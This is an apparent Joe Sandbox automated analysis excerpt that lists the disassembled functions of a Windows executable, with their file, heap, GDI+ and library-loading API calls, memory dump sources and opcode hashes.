                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: 8d27c3746c5dbd3a0128af4072fe88618916ffa92923e3a8488b4e16c20c4332
                                                            • Instruction ID: d658ef1c17ab8b5848a2c5f95465840fc089a64ce60f162eac7731b3d84f6175
                                                            • Opcode Fuzzy Hash: 8d27c3746c5dbd3a0128af4072fe88618916ffa92923e3a8488b4e16c20c4332
                                                            • Instruction Fuzzy Hash: D6314A71905209AFCF11DFA9C945AEEFBF6EF08300F2008AAE845A7351D7325E00DB60
                                                            Function 00BD9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BD73BC,?,?,?,00000000), ref: 00BD9DBC
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00BD9E70
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: 992914f1be81152ec6bd6b833da5dba2a825e2b4ac1f6f29e9dc79abf37d7931
                                                            • Instruction ID: e7615d6b0c3a7882acbfaccc7e4a98e26fb2609f51c9e8b209feee58826dd8c3
                                                            • Opcode Fuzzy Hash: 992914f1be81152ec6bd6b833da5dba2a825e2b4ac1f6f29e9dc79abf37d7931
                                                            • Instruction Fuzzy Hash: 2F21D031249285ABC714DF35C891AABFBE8EF55704F0849AEF4C587281E339E90CDB61
                                                            Function 00BD966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00BD9F27,?,?,00BD771A), ref: 00BD96E6
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00BD9F27,?,?,00BD771A), ref: 00BD9716
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: a444715827db890ad4d0e8adccec72e5ba151043358ea28594c6a1c43671f20f
                                                            • Instruction ID: edcae216baff3fe699f1bab4e8553c267e64e6064f46a3d604de1fea2d3b6ce3
                                                            • Opcode Fuzzy Hash: a444715827db890ad4d0e8adccec72e5ba151043358ea28594c6a1c43671f20f
                                                            • Instruction Fuzzy Hash: 8821CF71100344AFE3309A65CC89FA7B7DCEB49324F100A5AFA96C22D1E7B4A884DB31
                                                            Function 00BD9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00BD9EC7
                                                            • GetLastError.KERNEL32 ref: 00BD9ED4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 5018d7e7dae3dab883a27f23707b1ecd9653868c5df58366ba6d19588b5f407d
                                                            • Instruction ID: 64de9e965afb1d3dfa15c35dd9fbc9d3e2dfc80fefbe8921ac747e23d5571c54
                                                            • Opcode Fuzzy Hash: 5018d7e7dae3dab883a27f23707b1ecd9653868c5df58366ba6d19588b5f407d
                                                            • Instruction Fuzzy Hash: 2911E530600704EBE724C628C880BA6F7E9EB45360F504AABE552D27D0F774ED89C760
                                                            Function 00BF8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00BF8E75
                                                              • Part of subcall function 00BF8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00C11098,00BD17CE,?,?,00000007,?,?,?,00BD13D6,?,00000000), ref: 00BF8EB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocAllocate_free
                                                            • String ID:
                                                            • API String ID: 2447670028-0
                                                            • Opcode ID: a52dbbbc75a735f0bb564188252d49a9f3ddcc19a92d6b3319580cf2f54098e8
                                                            • Instruction ID: 6cc15050c507d26cb2a1489ae7c2869b1aae61edfc83bf84ed245faf2a55b2d0
                                                            • Opcode Fuzzy Hash: a52dbbbc75a735f0bb564188252d49a9f3ddcc19a92d6b3319580cf2f54098e8
                                                            • Instruction Fuzzy Hash: 80F0963260511D76DB212A25AC05B7F77D8CF91B70F2541E5FB14A7191DF70DD0985A0
                                                            Function 00BE109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 00BE10AB
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 00BE10B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: de6ad8d0ea808256b5302e80cf60d391e89870736dbdb68abc997eb9360da273
                                                            • Instruction ID: e367edfd9b5aff152c0243e57ce35b848087f927edabd902e812ae36a273d4d0
                                                            • Opcode Fuzzy Hash: de6ad8d0ea808256b5302e80cf60d391e89870736dbdb68abc997eb9360da273
                                                            • Instruction Fuzzy Hash: C2E0D832B101C5E7CF0987B99C05AEF73DDEA4420873085B6E403D3102FA34DE418760
                                                            Function 00BDA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA501
                                                              • Part of subcall function 00BDBB03: _wcslen.LIBCMT ref: 00BDBB27
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA532
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 202cd50d5fec49f1031c21cbc24604ebeb3a9657f773ec97372bf58c800bde0e
                                                            • Instruction ID: b9f3c8029d9daab99ad2161b7841f7dc895d5f8ea0b723e614074fd796d23eb3
                                                            • Opcode Fuzzy Hash: 202cd50d5fec49f1031c21cbc24604ebeb3a9657f773ec97372bf58c800bde0e
                                                            • Instruction Fuzzy Hash: DEF06532240149BBDF016F60DC45FDE77ACEF14389F4480A2B945D5260EB71DAD8DB60
                                                            Function 00BDA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(000000FF,?,?,00BD977F,?,?,00BD95CF,?,?,?,?,?,00C02641,000000FF), ref: 00BDA1F1
                                                              • Part of subcall function 00BDBB03: _wcslen.LIBCMT ref: 00BDBB27
                                                            • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BD977F,?,?,00BD95CF,?,?,?,?,?,00C02641), ref: 00BDA21F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            • Opcode ID: 2c6afba8cf2c414d39ec2c36350bc3de879b970f4ccc302f47097346cb521eb4
                                                            • Instruction ID: 8bd39e64fbe834e0ed94962a93e2fb9ad7ac406fd642b8294d1e2cb82d891f2b
                                                            • Opcode Fuzzy Hash: 2c6afba8cf2c414d39ec2c36350bc3de879b970f4ccc302f47097346cb521eb4
                                                            • Instruction Fuzzy Hash: D7E092311402497BDB015F61DC45FDD779CEB08385F4840A2B944D2150FB61DE84DA54
                                                            Function 00BEAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00C02641,000000FF), ref: 00BEACB0
                                                            • CoUninitialize.COMBASE(?,?,?,?,00C02641,000000FF), ref: 00BEACB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            • String ID:
                                                            • API String ID: 3856339756-0
                                                            • Opcode ID: 5ccc94d8003c04c5d3a34fd10d930c13dd2a8730d94048f3441bc01ea57a18f2
                                                            • Instruction ID: 1ff536ffade7f25af1b55a30837bb07525276ac33b2af516f9dca812bf2d80d0
                                                            • Opcode Fuzzy Hash: 5ccc94d8003c04c5d3a34fd10d930c13dd2a8730d94048f3441bc01ea57a18f2
                                                            • Instruction Fuzzy Hash: 31E06D72604690EFCB009B59DC4AB49FBACFB89B20F00426AF416D37A0CB74A940CA90
                                                            Function 00BDA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00BDA23A,?,00BD755C,?,?,?,?), ref: 00BDA254
                                                              • Part of subcall function 00BDBB03: _wcslen.LIBCMT ref: 00BDBB27
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00BDA23A,?,00BD755C,?,?,?,?), ref: 00BDA280
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: 1d3d831dedad4815aaea8a477844d8bcc8db73735c1ab7f4a21522f23fbd469d
                                                            • Instruction ID: 1cf0e9d957b6612d59edf6654e6823cfc39db14afda68698f9d195330ebc71c2
                                                            • Opcode Fuzzy Hash: 1d3d831dedad4815aaea8a477844d8bcc8db73735c1ab7f4a21522f23fbd469d
                                                            • Instruction Fuzzy Hash: 97E092315001649BDB20AB64CC05BD9F79CEB083E5F0542A2FD54E3294E770DE44CAA0
                                                            Function 00BEDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00BEDEEC
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 00BEDF03
                                                              • Part of subcall function 00BEB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEB579
                                                              • Part of subcall function 00BEB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEB58A
                                                              • Part of subcall function 00BEB568: IsDialogMessageW.USER32(0001043E,?), ref: 00BEB59E
                                                              • Part of subcall function 00BEB568: TranslateMessage.USER32(?), ref: 00BEB5AC
                                                              • Part of subcall function 00BEB568: DispatchMessageW.USER32(?), ref: 00BEB5B6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            • String ID:
                                                            • API String ID: 2718869927-0
                                                            • Opcode ID: 7dc6953e8362a3d761b46121bd77f6c9c4fd6bbd45d5a7cfa319ef8acefe9ee9
                                                            • Instruction ID: c9fca0a6a774d2801dcae4d86a2e7344e08c87b1cc3818b18237f6618bba25d6
                                                            • Opcode Fuzzy Hash: 7dc6953e8362a3d761b46121bd77f6c9c4fd6bbd45d5a7cfa319ef8acefe9ee9
                                                            • Instruction Fuzzy Hash: 52E092B251428866DF02AB61DC06FDE3BECAB15785F044892B201DA1E2EA78EA148761
                                                            Function 00BE081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BE0836
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BDF2D8,Crypt32.dll,00000000,00BDF35C,?,?,00BDF33E,?,?,?), ref: 00BE0858
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 64b27637e3c3d55f0c90828438cbdc25aec5cc40504acbc305dd45996f6d2af5
                                                            • Instruction ID: c1ab7e66b73ad9cadf1f09ea0f6f2b952297bbaa4b5905d8e3d8af09d1498531
                                                            • Opcode Fuzzy Hash: 64b27637e3c3d55f0c90828438cbdc25aec5cc40504acbc305dd45996f6d2af5
                                                            • Instruction Fuzzy Hash: 66E048764011986BDB11A795DC05FDA77ECEF0D3D1F0500A67645D2104D7B4DA84CBB0
                                                            Function 00BEA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BEA3DA
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00BEA3E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: e67135f253f21952792b6106f9661b01bb3aecb2ca15999bea81ee152065fd55
                                                            • Instruction ID: 3017bbb523d9d68db9dccdd468beb53fe8ee5ebdc153216fa08ac955bb29cdac
                                                            • Opcode Fuzzy Hash: e67135f253f21952792b6106f9661b01bb3aecb2ca15999bea81ee152065fd55
                                                            • Instruction Fuzzy Hash: 6AE0EDB1900258EBCB10DF5AC541799BBE8EF04360F20C09AA85693241E374EE04DB91
                                                            Function 00BF2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BF2BAA
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BF2BB5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            • Opcode ID: ea563862d98f16d1ba6084fe12dc41882c61b5f237877f031adbf383bcd0c616
                                                            • Instruction ID: f893de811b550c779b40bb8558e7be6c4beaec9aa04b2bda4cacf7f03b2a0ae0
                                                            • Opcode Fuzzy Hash: ea563862d98f16d1ba6084fe12dc41882c61b5f237877f031adbf383bcd0c616
                                                            • Instruction Fuzzy Hash: 8AD0A9381A830C18AC182B782A06A7823C5ED41B71BA016EAEF20874C3EA10804CA411
                                                            Function 00BD12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            • Opcode ID: 22f7689221cce11a0941a550e0dc567513789c53322fa76e6d1f796608f612a9
                                                            • Instruction ID: d7757a33d0c38603b2d3b1f20e17ae92a21a79ab2db5087b310a9e6d2c3ff3aa
                                                            • Opcode Fuzzy Hash: 22f7689221cce11a0941a550e0dc567513789c53322fa76e6d1f796608f612a9
                                                            • Instruction Fuzzy Hash: 92C0123226C280BECB010BB4DC09E2FBBA8ABA5312F04C908B4A5C0060C238C110DB11
                                                            Function 00BD1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
